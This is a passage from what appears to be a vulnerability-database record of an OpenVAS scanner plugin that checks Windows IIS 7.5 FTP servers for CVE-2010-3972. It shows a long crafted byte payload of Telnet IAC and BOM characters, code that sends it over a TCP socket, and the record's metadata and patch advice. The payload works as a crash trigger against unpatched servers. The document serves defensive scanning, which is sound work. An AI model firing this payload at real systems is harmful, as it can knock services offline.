0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef,
0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef,
0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,
0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef,
0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb,
0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef,
0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xef,
0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef,
0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb,
0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef,
0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff,
0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef,
0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,
0xff, 0xef, 0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff,
0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xfe,
0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff,
0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef,
0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb,
0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xfe, 0xff,
0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff,
0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff,
0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef,
0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,
0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff,
0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb,
0xbf, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef, 0xfe,
0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,
0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,
0xfe, 0xff, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb,
0xbf, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf,
0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef,
0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,
0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xfe,
0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe,
0xff, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff,
0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb,
0xbf, 0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xff,
0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff,
0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff,
0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff,
0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xff,
0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff,
0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef,
0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff,
0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef,
0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff,
0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xef,
0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff,
0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb,
0xbf, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf,
0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff,
0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef,
0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff,
0xef, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf,
0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,
0xfe, 0xff, 0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff,
0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff,
0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,
0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff,
0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef,
0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,
0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff,
0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb,
0xbf, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff, 0xff,
0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,
0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff,
0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff,
0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xff, 0xef,
0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,
0xff, 0xef, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef,
0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff,
0xfe, 0xff, 0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff,
0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef,
0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb,
0xbf, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
0xff, 0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff,
0xef, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,
0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf,
0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xff, 0xef,
0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef,
0xbb, 0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb,
0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe,
0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb,
0xbf, 0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xfe,
0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,
0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,
0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff,
0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xfe,
0xff, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
0xff, 0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff,
0xef, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xfe,
0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb,
0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,
0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef,
0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff,
0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff,
0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xfe,
0xff, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb,
0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xff, 0xef, 0xef,
0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff,
0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef,
0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xfe,
0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb,
0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff,
0xef, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff, 0xef,
0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,
0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff,
0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xfe,
0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef,
0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff,
0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff,
0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,
0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef,
0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xff, 0xef,
0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef,
0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,
0xff, 0xef, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef,
0xfe, 0xff, 0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff,
0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe,
0xff, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,
0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xfe,
0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff,
0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff,
0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff,
0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef,
0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb,
0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe,
0xff, 0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xff,
0xef, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb,
0xbf, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
0xff, 0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef,
0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xff, 0xef,
0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xff,
0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,
0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,
0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,
0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff,
0xef, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf,
0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,
0xfe, 0xff, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb,
0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef,
0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xfe,
0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff,
0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef,
0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef,
0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb,
0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef,
0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,
0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef, 0xff,
0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb,
0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,
0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef,
0xbb, 0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff,
0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef,
0xbb, 0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb,
0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb,
0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff,
0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb,
0xbf, 0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xfe,
0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xef,
0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff,
0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,
0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xef,
0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff,
0xef, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb,
0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef,
0xfe, 0xff, 0xfe, 0xff, 0xff, 0xef, 0xff, 0xef,
0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
0xff, 0xef, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb,
0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb,
0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb,
0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff,
0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef, 0xfe,
0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb,
0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,
0xbf, 0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xff,
0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef,
0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff,
0xef, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xef,
0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,
0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff,
0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff,
0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff,
0xff, 0xef, 0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff,
0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xfe,
0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xff,
0xef, 0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xff,
0xef, 0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xef,
0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb,
0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef,
0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe,
0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef,
0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,
0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,
0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef,
0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,
0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb,
0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,
0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe,
0xff, 0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff, 0xef,
0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff,
0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb,
0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb,
0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,
0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb,
0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef,
0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff,
0xef, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xef,
0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xfe,
0xff, 0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xff,
0xef, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xff,
0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,
0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb,
0xbf, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xfe,
0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff,
0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef,
0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xff, 0xef,
0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff,
0xef, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff, 0xef,
0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff,
0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xef,
0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff,
0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff,
0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb,
0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb,
0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb,
0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb,
0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,
0xbf, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf,
0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xfe,
0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef,
0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xff,
0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,
0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff,
0xef, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe,
0xff, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf,
0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xff, 0xef,
0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,
0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb,
0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,
0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb,
0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef,
0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,
0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,
0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,
0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xfe,
0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xff,
0xef, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf,
0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf,
0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff,
0xef, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf,
0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb,
0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb,
0xbf, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf,
0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff,
0xef, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf,
0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf,
0xff, 0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe,
0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff,
0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,
0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe,
0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff,
0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff,
0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb,
0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,
0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff,
0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xfe, 0xff,
0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xff, 0xef,
0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef, 0xef,
0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb,
0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,
0xbf, 0xef, 0xbb, 0xbf, 0x0d, 0x0a );
## Open TCP Socket
soc = open_sock_tcp(ftpPort);
if(!soc) {
exit(0);
}
banner = recv_line(socket:soc, length:100);
## Sending Attack
snd = send(socket:soc, data:attack);
## Response
res = recv_line(socket:soc, length:6400);
## Checking Vulnerable Patterns
if(res =~ '^\x30\0x31\x20\x27\xef\x83\xb0*\xff')
{
security_message(port:ftpPort);
exit(0);
}
close(soc);
{"id": "OPENVAS:801669", "type": "openvas", "bulletinFamily": "scanner", "title": "Microsoft Windows IIS FTP Server DOS Vulnerability", "description": "This host is running Microsoft IIS with FTP server and is prone to\n Denial of service vulnerability.", "published": "2010-12-27T00:00:00", "modified": "2017-02-17T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=801669", "reporter": "Copyright (C) 2010 Greenbone Networks GmbH", "references": ["http://secunia.com/advisories/42713", "http://www.securitytracker.com/id?1024921", "http://www.exploit-db.com/exploits/15803/", "http://www.vupen.com/english/advisories/2010/3305", "http://www.kb.cert.org/vuls/id/842372"], "cvelist": ["CVE-2010-3972"], "lastseen": "2017-07-02T21:10:01", "viewCount": 32, "enchantments": {"score": {"value": 6.6, "vector": "NONE"}, "dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2010-351", "CPAI-2014-2245"]}, {"type": "cve", "idList": ["CVE-2010-3972"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS75_FTPD_IAC_BOF"]}, {"type": "mskb", "idList": ["KB2489256"]}, {"type": "nessus", "idList": ["IIS_FTP7_HEAP_OVERFLOW.NASL", "SMB_NT_MS11-004.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310801669", "OPENVAS:1361412562310901183", "OPENVAS:901183"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11411"]}], "rev": 4}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2010-3972"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS75_FTPD_IAC_BOF"]}, {"type": "mskb", "idList": ["KB2489256"]}, {"type": "nessus", "idList": ["IIS_FTP7_HEAP_OVERFLOW.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310801669"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11411"]}]}, "exploitation": null, "vulnersScore": 6.6}, "pluginID": "801669", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ms_iis_ftpd_dos_vuln.nasl 5323 2017-02-17 08:49:23Z teissa $\n#\n# Microsoft Windows IIS FTP Server DOS Vulnerability\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Updated By : Sooraj KS <kssooraj@secpod.com> on 2011-04-12\n# Updated to detect vulnerable patterns.\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation may allow remote attackers to execute arbitrary code\n on the system or cause the application to crash.\n Impact Level: Application\";\ntag_affected = \"Windows 7 IIS 7.5 FTP Server\";\ntag_insight = \"The flaw is due to a boundary error when encoding Telnet IAC\n characters in a FTP response. This can be exploited without authenticating\n to the FTP service to cause a heap-based buffer overflow by sending an overly\n long, specially crafted FTP request.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://www.microsoft.com/technet/security/bulletin/ms11-004.mspx\";\ntag_summary = \"This host is running Microsoft IIS with FTP server and is prone to\n Denial of service vulnerability.\";\n\nif(description)\n{\n script_id(801669);\n script_version(\"$Revision: 5323 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-17 09:49:23 +0100 (Fri, 17 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-27 09:55:05 +0100 (Mon, 27 Dec 2010)\");\n script_cve_id(\"CVE-2010-3972\");\n script_bugtraq_id(45542);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n 